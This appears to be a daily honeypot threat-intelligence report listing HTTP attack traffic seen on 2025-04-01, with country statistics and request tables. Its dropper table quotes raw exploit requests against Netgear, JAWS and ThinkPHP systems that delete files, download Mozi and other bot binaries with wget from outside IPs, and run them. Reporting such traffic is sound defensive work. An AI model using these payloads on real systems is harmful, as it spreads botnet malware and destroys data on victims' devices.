Daily Report: 2025-04-01#
Interaction report on http service of various honeypot around the world.
ot_simplified_report#
Simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Germany |
ID | Germany |
US | Germany |
DE | Germany |
US | Germany |
US | Dubai |
CN | Georgia |
GB |
botnet_dropper_behaviour#
List of requests suspected of having stage 1 dropper behavior (programs designed to extract other files from their own code).
remote_addr | request |
---|---|
117.245.7.133 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
61.52.97.172 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://61.52.97.172:44680/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
103.207.124.222 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.207.124.222:43183/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
103.203.72.209 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.203.72.209:47702/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
123.4.159.241 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://123.4.159.241:60259/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
204.76.203.18 | GET /wget HTTP/1.1 |
47.101.204.123 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws HTTP/1.1 |
58.146.59.84 | GET /shell?cd+/tmp;rm+-rf+*;wget+ http://200.129.143.6/Binarys/Owari.arm;chmod+777+/tmp/Owari.arm;sh+/tmp/Owari.arm arm4.jaws HTTP/1.1 |
124.220.11.157 | GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.95.147.201%2Fbins%2Farm7%3B%20chmod%20777%20arm7%3B%20.%2Farm7%20jaws%3B HTTP/1.1\x5Cr\x5CnUser-Agent: Mozila/5.0\x5Cr\x5CnHost: 127.0.0.1:80\x5Cr\x5CnAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8\x5Cr\x5CnConnection: keep-alive\x5Cr\x5Cn\x5Cr\x5Cn\x11 |
85.122.180.176 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
1.192.193.208 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://37.49.224.156/heuNJloMYQKaZcisDXxjIzCGdvW75fyPt9EHUpkOVw0SmBbF8L/M3tH.x86 -O thinkphp ; chmod 777 thinkphp ; ./thinkphp ThinkPHP.selfrep ; rm -rf thinkphp’ HTTP/1.1 |
101.69.248.251 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
61.10.103.203 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
180.153.27.22 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
121.22.35.6 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
58.242.106.187 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
request#
List of requests of the day that have never been detected, other requests that have already been detected and archived in the request database..
number_of_occurence | request | |
---|---|---|
192 | 5 | GET /l7vmra HTTP/1.1 |
220 | 5 | GET /hmips HTTP/1.1 |
222 | 5 | GET /s/arm6 HTTP/1.1 |
225 | 5 | GET /s/arm7 HTTP/1.1 |
240 | 4 | GET /bins/dlr.arm HTTP/1.1 |
241 | 4 | GET /nshkarm HTTP/1.1 |
298 | 3 | GET /nshmips HTTP/1.1 |
299 | 3 | GET /nsharm5 HTTP/1.1 |
300 | 3 | GET /nshkppc HTTP/1.1 |
301 | 3 | GET /nsharm7 HTTP/1.1 |
303 | 3 | GET /nsharm HTTP/1.1 |
304 | 3 | GET /nshkx86 HTTP/1.1 |
305 | 3 | GET /nshmpsl HTTP/1.1 |
306 | 3 | GET /nshsh4 HTTP/1.1 |
335 | 3 | GET /s/mipsel HTTP/1.1 |
336 | 3 | GET /s/arm5 HTTP/1.1 |
337 | 3 | GET /x0ox0ox0oxDefault/z0r0.spc HTTP/1.1 |
338 | 3 | GET /x0ox0ox0oxDefault/z0r0.i686 HTTP/1.1 |
344 | 3 | GET /bins/k86m HTTP/1.1 |
347 | 3 | GET /bins/dlr.spc HTTP/1.1 |
348 | 3 | GET /bins/dlr.arm7 HTTP/1.1 |
349 | 3 | GET /bins/dlr.arm6 HTTP/1.1 |
350 | 3 | GET /bins/dlr.arm5 HTTP/1.1 |
351 | 3 | GET /bins/dlr.ppc HTTP/1.1 |
352 | 3 | GET /nshkmpsl HTTP/1.1 |
353 | 3 | GET /nshkmips HTTP/1.1 |
354 | 3 | GET /nshkarm7 HTTP/1.1 |
355 | 3 | GET /nshkarm5 HTTP/1.1 |
365 | 3 | GET /spim HTTP/1.1 |
366 | 3 | GET /bins/lespim HTTP/1.1 |
387 | 3 | GET /arm4 HTTP/1.1 |
388 | 3 | GET /Mozi.a HTTP/1.1 |
395 | 3 | GET /bins/dlr.mpsl HTTP/1.1 |
396 | 3 | GET /bins/dlr.mips HTTP/1.1 |
397 | 3 | GET /bins/dlr.sh4 HTTP/1.1 |
400 | 3 | GET /nshksh4 HTTP/1.1 |
477 | 3 | GET /bins/hydra.x86_64 HTTP/1.1 |
490 | 3 | GET /device.rsp?opt=user&cmd=list HTTP/1.1 |
525 | 2 | GET /bins/sora.x86 HTTP/1.1 |
536 | 2 | GET /s/mips HTTP/1.1 |
537 | 2 | GET /nsharm6 HTTP/1.1 |
538 | 2 | GET /nshppc HTTP/1.1 |
561 | 2 | GET /jasperserver/login.html HTTP/1.1 |
573 | 2 | GET /jasperserver-pro/login.html HTTP/1.1 |
604 | 2 | GET /bins/spim HTTP/1.1 |
618 | 2 | GET /bins/dlr.m68k HTTP/1.1 |
620 | 2 | GET /nshkarm6 HTTP/1.1 |
643 | 1 | GET /NmapUpperCheck1743482193 HTTP/1.1 |
645 | 1 | GET /Nmap/folder/check1743482193 HTTP/1.1 |
680 | 1 | GET /nmaplowercheck1743482193 HTTP/1.1 |
681 | 1 | GET /0Ijy HTTP/1.1 |
710 | 1 | GET /IPCamDesc.xml HTTP/1.1 |
715 | 1 | GET /kylin/ HTTP/1.1 |
737 | 1 | \x00\x0E\x08\xE2\x8Dd*\xFB{\x07Q\x00\x00\x00\x00\x00 |
738 | 1 | \x00\x0E8\xE2\x8Dd*\xFB{\x07Q\x00\x00\x00\x00\x00 |
791 | 1 | GET /odinhttpcall1743497781 HTTP/1.1 |
792 | 1 | GET /OdinHttpCall1743497781 HTTP/1.1 |
793 | 1 | GET /Odin/http/call1743497781 HTTP/1.1 |
809 | 1 | \x00\x0E8\x8F |
813 | 1 | \x00\x0E8\xDA\x94\x9E\x85q\x8Cl\xC3\x00\x00\x00\x00\x00 |
837 | 1 | \x00\x0E\x08\xF4u]\x14\x22\xB3\xD7\xCB\x00\x00\x00\x00\x00 |
838 | 1 | \x00\x0E8\xF4u]\x14\x22\xB3\xD7\xCB\x00\x00\x00\x00\x00 |
854 | 1 | \x00\x0E8w+/\x03D\x99\xE5E\x00\x00\x00\x00\x00 |
863 | 1 | \x00\x0E85\xD2d\x08\xB7\x1D\x13\xEF\x00\x00\x00\x00\x00 |
868 | 1 | GET /serein HTTP/1.1 |
903 | 1 | \x00\x0E\x08%\x22\xE0\xDBC\xD4h\x94\x00\x00\x00\x00\x00 |
904 | 1 | \x00\x0E8%\x22\xE0\xDBC\xD4h\x94\x00\x00\x00\x00\x00 |
910 | 1 | \x00\x0E8z:\xD80\x85\x91\x22\xB4\x00\x00\x00\x00\x00 |
914 | 1 | \x00\x0E8\x06\xEF\xC9\x99\x88_1z\x00\x00\x00\x00\x00 |
941 | 1 | \x00\x0E8y\xDA@\xCD\x82?\xF1\x14\x00\x00\x00\x00\x00 |
951 | 1 | GET /odinhttpcall1743487539 HTTP/1.1 |
964 | 1 | \x00\x0E8\xF4M\xEER\xB4\xD9p\x18\x00\x00\x00\x00\x00 |
965 | 1 | GET /OdinHttpCall1743487539 HTTP/1.1 |
966 | 1 | GET /Odin/http/call1743487539 HTTP/1.1 |
country_iso_code#
List of country names and number of requests received by IPs located in these countries.
number_of_occurence | country_iso_code | |
---|---|---|
0 | 1835 | NL |
1 | 402 | US |
2 | 261 | HK |
3 | 174 | BG |
4 | 163 | DE |
5 | 162 | FR |
6 | 137 | TW |
7 | 93 | GB |
8 | 86 | CN |
9 | 60 | RU |
10 | 52 | PL |
11 | 51 | SC |
12 | 50 | BR |
13 | 34 | UA |
14 | 32 | CA |
15 | 29 | IN |
16 | 22 | PT |
17 | 19 | JP |
18 | 11 | GH |
19 | 10 | NG |
20 | 9 | KR |
21 | 9 | CH |
22 | 8 | AZ |
23 | 7 | BE |
24 | 6 | ID |
25 | 6 | MY |
26 | 6 | IT |
27 | 4 | MN |
28 | 4 | AU |
29 | 3 | SG |
30 | 3 | IL |
31 | 3 | VN |
32 | 2 | IR |
33 | 2 | IE |
34 | 2 | TH |
35 | 2 | RO |
36 | 1 | MC |
37 | 1 | ES |
38 | 1 | NO |
39 | 1 | AO |
40 | 1 | CZ |
41 | 1 | AE |
42 | 1 | DK |
43 | 1 | SE |
44 | 1 | KH |